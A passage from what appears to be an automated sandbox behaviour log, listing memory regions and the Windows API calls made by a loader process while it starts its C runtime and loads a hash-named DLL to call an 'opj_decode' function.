0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4131 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4132 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4133 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4134 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4135 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6311 start_va = 0x1b0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 6312 start_va = 0x5d0000 end_va = 0x5f3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 6313 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6314 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Thread: id = 139 os_tid = 0xfc0 [0137.857] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0137.857] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0137.857] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0137.857] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0137.857] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0137.858] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0137.858] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0137.858] GetProcessHeap () returned 0x4d0000 [0137.858] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0137.859] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0137.859] GetLastError () returned 0x7e [0137.859] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsGetValue") returned 0x7ffc5bfe3780 [0137.859] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0137.859] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x3c8) returned 0x4dc2f0 [0137.859] SetLastError (dwErrCode=0x7e) [0137.859] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x1200) returned 0x4e3440 [0137.860] GetStartupInfoW (in: lpStartupInfo=0x14fe10 | out: lpStartupInfo=0x14fe10*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0137.860] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0137.860] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0137.860] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0137.860] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_decode" [0137.861] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_decode" [0137.861] GetACP () returned 0x4e4 [0137.861] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x228) returned 0x4d5350 [0137.861] IsValidCodePage (CodePage=0x4e4) returned 1 [0137.861] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14fdd0 | out: lpCPInfo=0x14fdd0) returned 1 [0137.861] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f670 | out: lpCPInfo=0x14f670) returned 1 [0137.861] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0137.861] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f3c0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ啐徑翼") returned 256 [0137.861] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ啐徑翼", cchSrc=256, lpCharType=0x14f990 | out: lpCharType=0x14f990) returned 1 [0137.861] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0137.861] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f360, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0137.861] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0137.861] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="LCMapStringEx") returned 0x7ffc5bfb5350 [0137.861] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0137.861] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f150, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0137.862] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f790, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", lpUsedDefaultChar=0x0) returned 256 [0137.862] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0137.862] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f360, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0137.862] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0137.862] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f150, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0137.862] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14f890, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0137.862] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x100) returned 0x4e2030 [0137.862] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7ff626f72300, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe")) returned 0x29 [0137.862] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x168) returned 0x4d9a70 [0137.862] RtlInitializeSListHead (in: ListHead=0x7ff626f72160 | out: ListHead=0x7ff626f72160) [0137.862] GetLastError () returned 0x0 [0137.862] SetLastError (dwErrCode=0x0) [0137.862] GetEnvironmentStringsW () returned 0x4e4650* [0137.862] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x9cc) returned 0x4e5030 [0137.862] FreeEnvironmentStringsW (penv=0x4e4650) returned 1 [0137.862] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x118) returned 0x4da440 [0137.862] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x3e) returned 0x4e0290 [0137.862] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x5c) returned 0x4d0780 [0137.862] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x62) returned 0x4d4bd0 [0137.862] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x78) returned 0x4dc6c0 [0137.862] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x62) returned 0x4d5a10 [0137.862] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x28) returned 0x4db3e0 [0137.862] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x48) returned 0x4e02e0 [0137.862] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x1a) returned 0x4db320 [0137.862] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x3a) returned 0x4e0790 [0137.862] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x62) returned 0x4d4940 [0137.862] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x2a) returned 0x4dc740 [0137.862] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x2e) returned 0x4d4c40 [0137.862] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x1c) returned 0x4db260 [0137.862] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0xd2) returned 0x4d5ca0 [0137.863] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x7c) returned 0x4d3fd0 [0137.863] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x3a) returned 0x4e06a0 [0137.863] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x90) returned 0x4d3c00 [0137.863] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x24) returned 0x4db290 [0137.863] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x30) returned 0x4d49b0 [0137.863] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x36) returned 0x4d5a80 [0137.863] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x3c) returned 0x4e0880 [0137.863] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x52) returned 0x4d9350 [0137.863] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x3c) returned 0x4e0740 [0137.863] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0xd6) returned 0x4d55e0 [0137.863] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x2e) returned 0x4d20c0 [0137.863] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x1e) returned 0x4db2c0 [0137.863] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x2c) returned 0x4d2100 [0137.863] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x54) returned 0x4d9470 [0137.863] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x52) returned 0x4d8f90 [0137.863] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x24) returned 0x4db830 [0137.863] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x42) returned 0x4dff70 [0137.863] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x2c) returned 0x4d2140 [0137.863] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x44) returned 0x4e07e0 [0137.863] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x24) returned 0x4db560 [0137.863] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e5030 | out: hHeap=0x4d0000) returned 1 [0137.863] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x1000) returned 0x4e4650 [0137.863] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff626f52580) returned 0x0 [0137.864] GetStartupInfoW (in: lpStartupInfo=0x14fea0 | out: lpStartupInfo=0x14fea0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0137.864] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_decode" [0137.864] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_decode", pNumArgs=0x14fe70 | out: pNumArgs=0x14fe70) returned 0x4d9740*="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" [0137.865] LoadLibraryW (lpLibFileName="C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll") returned 0x7ffc45e90000 [0137.868] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0137.868] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0137.868] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0137.868] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0137.868] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0137.869] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0137.869] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0137.870] GetProcessHeap () returned 0x4d0000 [0137.870] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0137.870] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0137.870] GetLastError () returned 0x0 [0137.870] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsGetValue") returned 0x7ffc5bfe3780 [0137.870] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0137.870] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x3c8) returned 